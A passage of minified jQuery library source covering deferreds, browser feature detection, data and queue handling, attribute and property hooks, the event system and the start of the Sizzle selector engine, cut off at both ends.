t=t||[],t=[e,t.slice?t.slice():t],a&&(!r||f)&&(i?f.push(t):l(t)),this},fire:function(){return c.fireWith(this,arguments),this},fired:function(){return!!r}};return c},y.extend({Deferred:function(e){var t=[["resolve","done",y.Callbacks("once memory"),"resolved"],["reject","fail",y.Callbacks("once memory"),"rejected"],["notify","progress",y.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return y.Deferred(function(n){y.each(t,function(t,s){var o=s[0],u=y.isFunction(e[t])&&e[t];i[s[1]](function(){var e=u&&u.apply(this,arguments);e&&y.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[o+"With"](this===r?n.promise():this,u?[e]:arguments)})}),e=null}).promise()},promise:function(e){return e!=null?y.extend(e,r):r}},i={};return r.pipe=r.then,y.each(t,function(e,s){var o=s[2],u=s[3];r[s[1]]=o.add,u&&o.add(function(){n=u},t[e^1][2].disable,t[2][2].lock),i[s[0]]=function(){return i[s[0]+"With"](this===i?r:this,arguments),this},i[s[0]+"With"]=o.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=p.call(arguments),r=n.length,i=r!==1||e&&y.isFunction(e.promise)?r:0,s=i===1?e:y.Deferred(),o=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?p.call(arguments):r,n===u?s.notifyWith(t,n):--i||s.resolveWith(t,n)}},u,a,f;if(r>1){u=new Array(r),a=new Array(r),f=new Array(r);for(;t<r;t++)n[t]&&y.isFunction(n[t].promise)?n[t].promise().done(o(t,f,n)).fail(s.reject).progress(o(t,a,u)):--i}return i||s.resolveWith(f,n),s.promise()}}),y.support=function(){var t,n,r,s,o,u,a,f,l,c,h=i.createElement("div");h.setAttribute("className","t"),h.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=h.getElementsByTagName("*"),r=h.getElementsByTagName("a")[0];if(!n||!r||!n.length)return{};s=i.createElement("select"),o=s.appendChild(i.createElement("option")),u=h.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={getSetAttribute:h.className!=="t",leadingWhitespace:h.firstChild.nodeType===3,tbody:!h.getElementsByTagName("tbody").length,htmlSerialize:!!h.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:r.getAttribute("href")==="/a",opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:!!u.value,optSelected:o.selected,enctype:!!i.createElement("form").enctype,html5Clone:i.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",boxModel:i.compatMode==="CSS1Compat",deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},u.checked=!0,t.noCloneChecked=u.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!o.disabled;try{delete h.test}catch(p){t.deleteExpando=!1}u=i.createElement("input"),u.setAttribute("value",""),t.input=u.getAttribute("value")==="",u.value="t",u.setAttribute("type","radio"),t.radioValue=u.value==="t",u.setAttribute("checked","t"),u.setAttribute("name","t"),a=i.createDocumentFragment(),a.appendChild(u),t.appendChecked=u.checked,t.checkClone=a.cloneNode(!0).cloneNode(!0).lastChild.checked,h.attachEvent&&(h.attachEvent("onclick",function(){t.noCloneEvent=!1}),h.cloneNode(!0).click());for(c in{submit:!0,change:!0,focusin:!0})h.setAttribute(f="on"+c,"t"),t[c+"Bubbles"]=f in e||h.attributes[f].expando===!1;return h.style.backgroundClip="content-box",h.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle=h.style.backgroundClip==="content-box",y(function(){var n,r,s,o="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",u=i.getElementsByTagName("body")[0];if(!u)return;n=i.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",u.appendChild(n).appendChild(h),h.innerHTML="<table><tr><td></td><td>t</td></tr></table>",s=h.getElementsByTagName("td"),s[0].style.cssText="padding:0;margin:0;border:0;display:none",l=s[0].offsetHeight===0,s[0].style.display="",s[1].style.display="none",t.reliableHiddenOffsets=l&&s[0].offsetHeight===0,h.innerHTML="",h.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=h.offsetWidth===4,t.doesNotIncludeMarginInBodyOffset=u.offsetTop!==1,e.getComputedStyle&&(t.pixelPosition=(e.getComputedStyle(h,null)||{}).top!=="1%",t.boxSizingReliable=(e.getComputedStyle(h,null)||{width:"4px"}).width==="4px",r=h.appendChild(i.createElement("div")),r.style.cssText=h.style.cssText=o,r.style.marginRight=r.style.width="0",h.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof h.style.zoom!="undefined"&&(h.innerHTML="",h.style.cssText=o+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=h.offsetWidth===3,h.style.display="block",h.innerHTML="<div></div>",h.firstChild.style.width="5px",t.shrinkWrapBlocks=h.offsetWidth!==3,u.style.zoom=1),u.removeChild(n),n=h=s=r=null}),n=s=a=o=r=u=null,t}();var H=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,B=/([A-Z])/g;y.extend({cache:{},expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?y.cache[e[y.expando]]:e[y.expando],!!e&&!q(e)},data:function(e,t,n){return j(e,t,n,!1)},removeData:function(e,t){return F(e,t,!1)},_data:function(e,t,n){return j(e,t,n,!0)},_removeData:function(e,t){return F(e,t,!0)},acceptData:function(e){var t=e.nodeName&&y.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),y.fn.extend({data:function(e,n){var r,i,s=this[0],o=0,u=null;if(e===t){if(this.length){u=y.data(s);if(s.nodeType===1&&!y._data(s,"parsedAttrs")){r=s.attributes;for(;o<r.length;o++)i=r[o].name,i.indexOf("data-")||(i=y.camelCase(i.substring(5)),I(s,i,u[i]));y._data(s,"parsedAttrs",!0)}}return u}return typeof e=="object"?this.each(function(){y.data(this,e)}):y.access(this,function(n){if(n===t)return s?I(s,e,y.data(s,e)):null;this.each(function(){y.data(this,e,n)})},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){y.removeData(this,e)})}}),y.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=y._data(e,t),n&&(!r||y.isArray(n)?r=y._data(e,t,y.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=y.queue(e,t),r=n.length,i=n.shift(),s=y._queueHooks(e,t),o=function(){y.dequeue(e,t)};i==="inprogress"&&(i=n.shift(),r--),s.cur=i,i&&(t==="fx"&&n.unshift("inprogress"),delete s.stop,i.call(e,o,s)),!r&&s&&s.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return y._data(e,n)||y._data(e,n,{empty:y.Callbacks("once memory").add(function(){y._removeData(e,t+"queue"),y._removeData(e,n)})})}}),y.fn.extend({queue:function(e,n){var r=2;return typeof e!="string"&&(n=e,e="fx",r--),arguments.length<r?y.queue(this[0],e):n===t?this:this.each(function(){var t=y.queue(this,e,n);y._queueHooks(this,e),e==="fx"&&t[0]!=="inprogress"&&y.dequeue(this,e)})},dequeue:function(e){return this.each(function(){y.dequeue(this,e)})},delay:function(e,t){return e=y.fx?y.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,s=y.Deferred(),o=this,u=this.length,a=function(){--i||s.resolveWith(o,[o])};typeof e!="string"&&(n=e,e=t),e=e||"fx";while(u--)r=y._data(o[u],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(a));return a(),s.promise(n)}});var R,U,z=/[\t\r\n]/g,W=/\r/g,X=/^(?:input|select|textarea|button|object)$/i,V=/^(?:a|area)$/i,$=/^(?:checked|selected|autofocus|autoplay|async|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped)$/i,J=/^(?:checked|selected)$/i,K=y.support.getSetAttribute,Q=y.support.input;y.fn.extend({attr:function(e,t){return y.access(this,y.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){y.removeAttr(this,e)})},prop:function(e,t){return y.access(this,y.prop,e,t,arguments.length>1)},removeProp:function(e){return e=y.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,s,o=0,u=this.length,a=typeof e=="string"&&e;if(y.isFunction(e))return this.each(function(t){y(this).addClass(e.call(this,t,this.className))});if(a){t=(e||"").match(w)||[];for(;o<u;o++){n=this[o],r=n.nodeType===1&&(n.className?(" "+n.className+" ").replace(z," "):" ");if(r){s=0;while(i=t[s++])r.indexOf(" "+i+" ")<0&&(r+=i+" ");n.className=y.trim(r)}}}return this},removeClass:function(e){var t,n,r,i,s,o=0,u=this.length,a=arguments.length===0||typeof e=="string"&&e;if(y.isFunction(e))return this.each(function(t){y(this).removeClass(e.call(this,t,this.className))});if(a){t=(e||"").match(w)||[];for(;o<u;o++){n=this[o],r=n.nodeType===1&&(n.className?(" "+n.className+" ").replace(z," "):"");if(r){s=0;while(i=t[s++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?y.trim(r):""}}}return this},toggleClass:function(e,t){var n=typeof e,r=typeof t=="boolean";return y.isFunction(e)?this.each(function(n){y(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if(n==="string"){var i,s=0,o=y(this),u=t,a=e.match(w)||[];while(i=a[s++])u=r?u:!o.hasClass(i),o[u?"addClass":"removeClass"](i)}else if(n==="undefined"||n==="boolean")this.className&&y._data(this,"__className__",this.className),this.className=this.className||e===!1?"":y._data(this,"__className__")||""})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;n<r;n++)if(this[n].nodeType===1&&(" "+this[n].className+" ").replace(z," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,s=this[0];if(!arguments.length){if(s)return n=y.valHooks[s.type]||y.valHooks[s.nodeName.toLowerCase()],n&&"get"in n&&(r=n.get(s,"value"))!==t?r:(r=s.value,typeof r=="string"?r.replace(W,""):r==null?"":r);return}return i=y.isFunction(e),this.each(function(r){var s,o=y(this);if(this.nodeType!==1)return;i?s=e.call(this,r,o.val()):s=e,s==null?s="":typeof s=="number"?s+="":y.isArray(s)&&(s=y.map(s,function(e){return e==null?"":e+""})),n=y.valHooks[this.type]||y.valHooks[this.nodeName.toLowerCase()];if(!n||!("set"in n)||n.set(this,s,"value")===t)this.value=s})}}),y.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,s=e.type==="select-one"||i<0,o=s?null:[],u=s?i+1:r.length,a=i<0?u:s?i:0;for(;a<u;a++){n=r[a];if((n.selected||a===i)&&(y.support.optDisabled?!n.disabled:n.getAttribute("disabled")===null)&&(!n.parentNode.disabled||!y.nodeName(n.parentNode,"optgroup"))){t=y(n).val();if(s)return t;o.push(t)}}return o},set:function(e,t){var n=y.makeArray(t);return y(e).find("option").each(function(){this.selected=y.inArray(y(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attr:function(e,n,r){var i,s,o,u=e.nodeType;if(!e||u===3||u===8||u===2)return;if(typeof e.getAttribute=="undefined")return y.prop(e,n,r);o=u!==1||!y.isXMLDoc(e),o&&(n=n.toLowerCase(),s=y.attrHooks[n]||($.test(n)?U:R));if(r===t)return s&&o&&"get"in s&&(i=s.get(e,n))!==null?i:(typeof e.getAttribute!="undefined"&&(i=e.getAttribute(n)),i==null?t:i);if(r!==null)return s&&o&&"set"in s&&(i=s.set(e,r,n))!==t?i:(e.setAttribute(n,r+""),r);y.removeAttr(e,n)},removeAttr:function(e,t){var n,r,i=0,s=t&&t.match(w);if(s&&e.nodeType===1)while(n=s[i++])r=y.propFix[n]||n,$.test(n)?!K&&J.test(n)?e[y.camelCase("default-"+n)]=e[r]=!1:e[r]=!1:y.attr(e,n,""),e.removeAttribute(K?n:r)},attrHooks:{type:{set:function(e,t){if(!y.support.radioValue&&t==="radio"&&y.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,s,o,u=e.nodeType;if(!e||u===3||u===8||u===2)return;return o=u!==1||!y.isXMLDoc(e),o&&(n=y.propFix[n]||n,s=y.propHooks[n]),r!==t?s&&"set"in s&&(i=s.set(e,r,n))!==t?i:e[n]=r:s&&"get"in s&&(i=s.get(e,n))!==null?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):X.test(e.nodeName)||V.test(e.nodeName)&&e.href?0:t}}}}),U={get:function(e,n){var r=y.prop(e,n),i=typeof r=="boolean"&&e.getAttribute(n),s=typeof r=="boolean"?Q&&K?i!=null:J.test(n)?e[y.camelCase("default-"+n)]:!!i:e.getAttributeNode(n);return s&&s.value!==!1?n.toLowerCase():t},set:function(e,t,n){return t===!1?y.removeAttr(e,n):Q&&K||!J.test(n)?e.setAttribute(!K&&y.propFix[n]||n,n):e[y.camelCase("default-"+n)]=e[n]=!0,n}};if(!Q||!K)y.attrHooks.value={get:function(e,n){var r=e.getAttributeNode(n);return y.nodeName(e,"input")?e.defaultValue:r&&r.specified?r.value:t},set:function(e,t,n){if(!y.nodeName(e,"input"))return R&&R.set(e,t,n);e.defaultValue=t}};K||(R=y.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&(n==="id"||n==="name"||n==="coords"?r.value!=="":r.specified)?r.value:t},set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i. value=n+="",r==="value"||n===e.getAttribute(r)?n:t}},y.attrHooks.contenteditable={get:R.get,set:function(e,t,n){R.set(e,t===""?!1:t,n)}},y.each(["width","height"],function(e,t){y.attrHooks[t]=y.extend(y.attrHooks[t],{set:function(e,n){if(n==="")return e.setAttribute(t,"auto"),n}})})),y.support.hrefNormalized||(y.each(["href","src","width","height"],function(e,n){y.attrHooks[n]=y.extend(y.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return r==null?t:r}})}),y.each(["href","src"],function(e,t){y.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}})),y.support.style||(y.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),y.support.optSelected||(y.propHooks.selected=y.extend(y.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),y.support.enctype||(y.propFix.enctype="encoding"),y.support.checkOn||y.each(["radio","checkbox"],function(){y.valHooks[this]={get:function(e){return e.getAttribute("value")===null?"on":e.value}}}),y.each(["radio","checkbox"],function(){y.valHooks[this]=y.extend(y.valHooks[this],{set:function(e,t){if(y.isArray(t))return e.checked=y.inArray(y(e).val(),t)>=0}})});var G=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|contextmenu)|click/,et=/^(?:focusinfocus|focusoutblur)$/,tt=/^([^.]*)(?:\.(.+)|)$/;y.event={global:{},add:function(e,n,r,i,s){var o,u,a,f,l,c,h,p,d,v,m,g=e.nodeType!==3&&e.nodeType!==8&&y._data(e);if(!g)return;r.handler&&(o=r,r=o.handler,s=o.selector),r.guid||(r.guid=y.guid++),(f=g.events)||(f=g.events={}),(u=g.handle)||(u=g.handle=function(e){return typeof y=="undefined"||!!e&&y.event.triggered===e.type?t:y.event.dispatch.apply(u.elem,arguments)},u.elem=e),n=(n||"").match(w)||[""],l=n.length;while(l--){a=tt.exec(n[l])||[],d=m=a[1],v=(a[2]||"").split(".").sort(),h=y.event.special[d]||{},d=(s?h.delegateType:h.bindType)||d,h=y.event.special[d]||{},c=y.extend({type:d,origType:m,data:i,handler:r,guid:r.guid,selector:s,needsContext:s&&y.expr.match.needsContext.test(s),namespace:v.join(".")},o);if(!(p=f[d])){p=f[d]=[],p.delegateCount=0;if(!h.setup||h.setup.call(e,i,v,u)===!1)e.addEventListener?e.addEventListener(d,u,!1):e.attachEvent&&e.attachEvent("on"+d,u)}h.add&&(h.add.call(e,c),c.handler.guid||(c.handler.guid=r.guid)),s?p.splice(p.delegateCount++,0,c):p.push(c),y.event.global[d]=!0}e=null},remove:function(e,t,n,r,i){var s,o,u,a,f,l,c,h,p,d,v,m=y.hasData(e)&&y._data(e);if(!m||!(a=m.events))return;t=(t||"").match(w)||[""],f=t.length;while(f--){u=tt.exec(t[f])||[],p=v=u[1],d=(u[2]||"").split(".").sort();if(!p){for(p in a)y.event.remove(e,p+t[f],n,r,!0);continue}c=y.event.special[p]||{},p=(r?c.delegateType:c.bindType)||p,h=a[p]||[],u=u[2]&&new RegExp("(^|\\.)"+d.join("\\.(?:.*\\.|)")+"(\\.|$)"),o=s=h.length;while(s--)l=h[s],(i||v===l.origType)&&(!n||n.guid===l.guid)&&(!u||u.test(l.namespace))&&(!r||r===l.selector||r==="**"&&l.selector)&&(h.splice(s,1),l.selector&&h.delegateCount--,c.remove&&c.remove.call(e,l));o&&!h.length&&((!c.teardown||c.teardown.call(e,d,m.handle)===!1)&&y.removeEvent(e,p,m.handle),delete a[p])}y.isEmptyObject(a)&&(delete m.handle,y._removeData(e,"events"))},trigger:function(n,r,s,o){var u,a,f,l,c,h,p,d=[s||i],v=n.type||n,m=n.namespace?n.namespace.split("."):[];a=f=s=s||i;if(s.nodeType===3||s.nodeType===8)return;if(et.test(v+y.event.triggered))return;v.indexOf(".")>=0&&(m=v.split("."),v=m.shift(),m.sort()),c=v.indexOf(":")<0&&"on"+v,n=n[y.expando]?n:new y.Event(v,typeof n=="object"&&n),n.isTrigger=!0,n.namespace=m.join("."),n.namespace_re=n.namespace?new RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=s),r=r==null?[n]:y.makeArray(r,[n]),p=y.event.special[v]||{};if(!o&&p.trigger&&p.trigger.apply(s,r)===!1)return;if(!o&&!p.noBubble&&!y.isWindow(s)){l=p.delegateType||v,et.test(l+v)||(a=a.parentNode);for(;a;a=a.parentNode)d.push(a),f=a;f===(s.ownerDocument||i)&&d.push(f.defaultView||f.parentWindow||e)}u=0;while((a=d[u++])&&!n.isPropagationStopped())n.type=u>1?l:p.bindType||v,h=(y._data(a,"events")||{})[n.type]&&y._data(a,"handle"),h&&h.apply(a,r),h=c&&a[c],h&&y.acceptData(a)&&h.apply&&h.apply(a,r)===!1&&n.preventDefault();n.type=v;if(!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(s.ownerDocument,r)===!1)&&(v!=="click"||!y.nodeName(s,"a"))&&y.acceptData(s)&&c&&s[v]&&!y.isWindow(s)){f=s[c],f&&(s[c]=null),y.event.triggered=v;try{s[v]()}catch(g){}y.event.triggered=t,f&&(s[c]=f)}return n.result},dispatch:function(e){e=y.event.fix(e);var n,r,i,s,o,u=[],a=p.call(arguments),f=(y._data(this,"events")||{})[e.type]||[],l=y.event.special[e.type]||{};a[0]=e,e.delegateTarget=this;if(l.preDispatch&&l.preDispatch.call(this,e)===!1)return;u=y.event.handlers.call(this,e,f),n=0;while((s=u[n++])&&!e.isPropagationStopped()){e.currentTarget=s.elem,r=0;while((o=s.handlers[r++])&&!e.isImmediatePropagationStopped())if(!e.namespace_re||e.namespace_re.test(o.namespace))e.handleObj=o,e.data=o.data,i=((y.event.special[o.origType]||{}).handle||o.handler).apply(s.elem,a),i!==t&&(e.result=i)===!1&&(e.preventDefault(),e.stopPropagation())}return l.postDispatch&&l.postDispatch.call(this,e),e.result},handlers:function(e,n){var r,i,s,o,u=[],a=n.delegateCount,f=e.target;if(a&&f.nodeType&&(!e.button||e.type!=="click"))for(;f!=this;f=f.parentNode||this)if(f.disabled!==!0||e.type!=="click"){i=[];for(r=0;r<a;r++)o=n[r],s=o.selector+" ",i[s]===t&&(i[s]=o.needsContext?y(s,this).index(f)>=0:y.find(s,this,null,[f]).length),i[s]&&i.push(o);i.length&&u.push({elem:f,handlers:i})}return a<n.length&&u.push({elem:this,handlers:n.slice(a)}),u},fix:function(e){if(e[y.expando])return e;var t,n,r=e,s=y.event.fixHooks[e.type]||{},o=s.props?this.props.concat(s.props):this.props;e=new y.Event(r),t=o.length;while(t--)n=o[t],e[n]=r[n];return e.target||(e.target=r.srcElement||i),e.target.nodeType===3&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,r):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return e.which==null&&(e.which=t.charCode!=null?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,s,o,u=n.button,a=n.fromElement;return e.pageX==null&&n.clientX!=null&&(r=e.target.ownerDocument||i,s=r.documentElement,o=r.body,e.pageX=n.clientX+(s&&s.scrollLeft||o&&o.scrollLeft||0)-(s&&s.clientLeft||o&&o.clientLeft||0),e.pageY=n.clientY+(s&&s.scrollTop||o&&o.scrollTop||0)-(s&&s.clientTop||o&&o.clientTop||0)),!e.relatedTarget&&a&&(e.relatedTarget=a===e.target?n.toElement:a),!e.which&&u!==t&&(e.which=u&1?1:u&2?3:u&4?2:0),e}},special:{load:{noBubble:!0},click:{trigger:function(){if(y.nodeName(this,"input")&&this.type==="checkbox"&&this.click)return this.click(),!1}},focus:{trigger:function(){if(this!==i.activeElement&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){if(this===i.activeElement&&this.blur)return this.blur(),!1},delegateType:"focusout"},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=y.extend(new y.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?y.event.trigger(i,null,t):y.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},y.removeEvent=i.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]=="undefined"&&(e[r]=null),e.detachEvent(r,n))},y.Event=function(e,t){if(!(this instanceof y.Event))return new y.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?nt:rt):this.type=e,t&&y.extend(this,t),this.timeStamp=e&&e.timeStamp||y.now(),this[y.expando]=!0},y.Event.prototype={isDefaultPrevented:rt,isPropagationStopped:rt,isImmediatePropagationStopped:rt,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=nt;if(!e)return;e.preventDefault?e.preventDefault():e.returnValue=!1},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=nt;if(!e)return;e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=nt,this.stopPropagation()}},y.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){y.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,s=e.handleObj;if(!i||i!==r&&!y.contains(r,i))e.type=s.origType,n=s.handler.apply(this,arguments),e.type=t;return n}}}),y.support.submitBubbles||(y.event.special.submit={setup:function(){if(y.nodeName(this,"form"))return!1;y.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=y.nodeName(n,"input")||y.nodeName(n,"button")?n.form:t;r&&!y._data(r,"submitBubbles")&&(y.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),y._data(r,"submitBubbles",!0))})},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&y.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){if(y.nodeName(this,"form"))return!1;y.event.remove(this,"._submit")}}),y.support.changeBubbles||(y.event.special.change={setup:function(){if(G.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")y.event.add(this,"propertychange._change",function(e){e.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),y.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),y.event.simulate("change",this,e,!0)});return!1}y.event.add(this,"beforeactivate._change",function(e){var t=e.target;G.test(t.nodeName)&&!y._data(t,"changeBubbles")&&(y.event.add(t,"change._change",function(e){this.parentNode&&!e.isSimulated&&!e.isTrigger&&y.event.simulate("change",this.parentNode,e,!0)}),y._data(t,"changeBubbles",!0))})},handle:function(e){var t=e.target;if(this!==t||e.isSimulated||e.isTrigger||t.type!=="radio"&&t.type!=="checkbox")return e.handleObj.handler.apply(this,arguments)},teardown:function(){return y.event.remove(this,"._change"),!G.test(this.nodeName)}}),y.support.focusinBubbles||y.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){y.event.simulate(t,e.target,y.event.fix(e),!0)};y.event.special[t]={setup:function(){n++===0&&i.addEventListener(e,r,!0)},teardown:function(){--n===0&&i.removeEventListener(e,r,!0)}}}),y.fn.extend({on:function(e,n,r,i,s){var o,u;if(typeof e=="object"){typeof n!="string"&&(r=r||n,n=t);for(u in e)this.on(u,n,r,e[u],s);return this}r==null&&i==null?(i=n,r=n=t):i==null&&(typeof n=="string"?(i=r,r=t):(i=r,r=n,n=t));if(i===!1)i=rt;else if(!i)return this;return s===1&&(o=i,i=function(e){return y().off(e),o.apply(this,arguments)},i.guid=o.guid||(o.guid=y.guid++)),this.each(function(){y.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,s;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,y(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if(typeof e=="object"){for(s in e)this.off(s,n,e[s]);return this}if(n===!1||typeof n=="function")r=n,n=t;return r===!1&&(r=rt),this.each(function(){y.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return arguments.length===1?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){y.event.trigger(e,t,this)})},triggerHandler:function(e,t){var n=this[0];if(n)return y.event.trigger(e,t,n,!0)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),y.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){y.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)},Y.test(t)&&(y.event.fixHooks[t]=y.event.keyHooks),Z.test(t)&&(y.event.fixHooks[t]=y.event.mouseHooks)}),function(e,t){function rt(e){return J.test(e+"")}function it(){var e,t=[];return e=function(n,r){return t.push(n+=" ")>i.cacheLength&&delete e[t.shift()],e[n]=r}}function st(e){return e[w]=!0,e}function ot(e){var t=c.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}}function ut(e,t,n,r){var i,s,o,u,a,f,h,v,m,y;(t?t.ownerDocument||t:E)!==c&&l(t),t=t||c,n=n||[];if(!e||typeof e!="string")return n;if((u=t.nodeType)!==1&&u!==9)return[];if(!p&&!r){if(i=K.exec(e))if(o=i[1]){if(u===9){s=t.getElementById(o);if(!s||!s.parentNode)return n;if(s.id===o)return n.push(s),n}else if(t.ownerDocument&&(s=t.ownerDocument.getElementById(o))&&g(t,s)&&s.id===o)return n.push(s),n}else{if(i[2])return _.apply(n,D.call(t.getElementsByTagName(e),0)),n;if((o=i[3])&&S.getByClassName&&t.getElementsByClassName)return _.apply(n,D.call(t.getElementsByClassName(o),0)),n}if(S.qsa&&!d.test(e)){h=!0,v=w,m=t,y=u===9&&e;if(u===1&&t.nodeName.toLowerCase()!=="object"){f=ht(e),(h=t.getAttribute("id"))?v=h.replace(Y,"\\$&"):t.setAttribute("id",v),v="[id='"+v+"'] ",a=f.length;while(a--)f[a]=v+pt(f[a]);m=$.test(e)&&t.parentNode||t,y=f.join(",")}if(y)try{return _.apply(n,D.call(m.querySelectorAll(y),0)),n}catch(b){}finally{h||t.removeAttribute("id")}}}return Et(e.replace(R,"$1"),t,n,r)}function at(e,t){var n=e&&t&&e.nextSibling;for(;n;n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return n==="input"&&t.type===e}}function lt(e){return function(t){var n=t.nodeName.toLowerCase();return(n==="input"||n==="button")&&t.type===e}}function ct(e){return st(function(t){return t=+t,st(function(n,r){var 